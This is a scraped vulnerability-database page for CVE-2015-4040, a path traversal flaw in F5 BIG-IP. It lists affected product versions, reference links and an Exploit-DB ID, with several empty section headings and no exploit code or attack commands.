F5>>Big-ip_local_traffic_manager >> Version 11.5.8 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.5.9 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.5.10 (Open CPE detail)
F5>>Big-ip_local_traffic_manager >> Version 11.6.0 (Open CPE detail)

F5>>Big-ip_policy_enforcement_manager >> Version To (including) 11.3.0

F5>>Big-ip_policy_enforcement_manager >> Version - (Open CPE detail)
F5>>Big-ip_policy_enforcement_manager >> Version 9.2.2 (Open CPE detail)
F5>>Big-ip_policy_enforcement_manager >> Version 10.1.0 (Open CPE detail)
F5>>Big-ip_policy_enforcement_manager >> Version 10.2.0 (Open CPE detail)
F5>>Big-ip_policy_enforcement_manager >> Version 10.2.1 (Open CPE detail)
F5>>Big-ip_policy_enforcement_manager >> Version 10.2.2 (Open CPE detail)
F5>>Big-ip_policy_enforcement_manager >> Version 10.2.3 (Open CPE detail)
F5>>Big-ip_policy_enforcement_manager >> Version 10.2.4 (Open CPE detail)
F5>>Big-ip_policy_enforcement_manager >> Version 11.0.0 (Open CPE detail)
F5>>Big-ip_policy_enforcement_manager >> Version 11.1.0 (Open CPE detail)
F5>>Big-ip_policy_enforcement_manager >> Version 11.2.0 (Open CPE detail)
F5>>Big-ip_policy_enforcement_manager >> Version 11.2.1 (Open CPE detail)
F5>>Big-ip_policy_enforcement_manager >> Version 11.3.0 (Open CPE detail)

F5>>Big-ip_protocol_security_module >> Version To (including) 11.3.0

F5>>Big-ip_protocol_security_module >> Version 9.4.5 (Open CPE detail)
F5>>Big-ip_protocol_security_module >> Version 9.4.6 (Open CPE detail)
F5>>Big-ip_protocol_security_module >> Version 9.4.7 (Open CPE detail)
F5>>Big-ip_protocol_security_module >> Version 9.4.8 (Open CPE detail)
F5>>Big-ip_protocol_security_module >> Version 10.0.0 (Open CPE detail)
F5>>Big-ip_protocol_security_module >> Version 10.0.1 (Open CPE detail)
F5>>Big-ip_protocol_security_module >> Version 10.1.0 (Open CPE detail)
F5>>Big-ip_protocol_security_module >> Version 10.2.0 (Open CPE detail)
F5>>Big-ip_protocol_security_module >> Version 10.2.1 (Open CPE detail)
F5>>Big-ip_protocol_security_module >> Version 10.2.2 (Open CPE detail)
F5>>Big-ip_protocol_security_module >> Version 10.2.3 (Open CPE detail)
F5>>Big-ip_protocol_security_module >> Version 10.2.4 (Open CPE detail)
F5>>Big-ip_protocol_security_module >> Version 11.0.0 (Open CPE detail)
F5>>Big-ip_protocol_security_module >> Version 11.1.0 (Open CPE detail)
F5>>Big-ip_protocol_security_module >> Version 11.2.0 (Open CPE detail)
F5>>Big-ip_protocol_security_module >> Version 11.2.1 (Open CPE detail)
F5>>Big-ip_protocol_security_module >> Version 11.3.0 (Open CPE detail)

F5>>Big-ip_wan_optimization_manager >> Version To (including) 11.3.0

F5>>Big-ip_wan_optimization_manager >> Version 10.0.0 (Open CPE detail)
F5>>Big-ip_wan_optimization_manager >> Version 10.0.1 (Open CPE detail)
F5>>Big-ip_wan_optimization_manager >> Version 10.1.0 (Open CPE detail)
F5>>Big-ip_wan_optimization_manager >> Version 10.2.0 (Open CPE detail)
F5>>Big-ip_wan_optimization_manager >> Version 10.2.1 (Open CPE detail)
F5>>Big-ip_wan_optimization_manager >> Version 10.2.2 (Open CPE detail)
F5>>Big-ip_wan_optimization_manager >> Version 10.2.3 (Open CPE detail)
F5>>Big-ip_wan_optimization_manager >> Version 10.2.4 (Open CPE detail)
F5>>Big-ip_wan_optimization_manager >> Version 11.0.0 (Open CPE detail)
F5>>Big-ip_wan_optimization_manager >> Version 11.1.0 (Open CPE detail)
F5>>Big-ip_wan_optimization_manager >> Version 11.2.0 (Open CPE detail)
F5>>Big-ip_wan_optimization_manager >> Version 11.2.1 (Open CPE detail)
F5>>Big-ip_wan_optimization_manager >> Version 11.3.0 (Open CPE detail)

F5>>Big-ip_webaccelerator >> Version To (including) 11.3.0

F5>>Big-ip_webaccelerator >> Version - (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 9.2.2 (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 9.4.0 (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 9.4.1 (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 9.4.2 (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 9.4.3 (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 9.4.4 (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 9.4.5 (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 9.4.6 (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 9.4.7 (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 9.4.8 (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 10.0.0 (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 10.0.1 (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 10.1.0 (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 10.2.0 (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 10.2.1 (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 10.2.2 (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 10.2.3 (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 10.2.4 (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 11.0.0 (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 11.1.0 (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 11.2.0 (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 11.2.1 (Open CPE detail)
F5>>Big-ip_webaccelerator >> Version 11.3.0 (Open CPE detail)

References

http://packetstormsecurity.com/files/133931/F5-BigIP-10.2.4-Build-595.0-HF3-Path-Traversal.html
Tags : x_refsource_MISC

http://www.securitytracker.com/id/1033533
Tags : vdb-entry, x_refsource_SECTRACK

https://support.f5.com/kb/en-us/solutions/public/17000/200/sol17253.html
Tags : x_refsource_CONFIRM

http://www.securitytracker.com/id/1033532
Tags : vdb-entry, x_refsource_SECTRACK

CVE-2015-4040 : Detail

CVE-2015-4040

CVE Descriptions

CVE Informations

Related Weaknesses

Metrics

EPSS

EPSS Score

EPSS Percentile

Exploit information

Exploit Database EDB-ID : 38448

Products Mentioned

Configuraton 0

Configuraton 0

References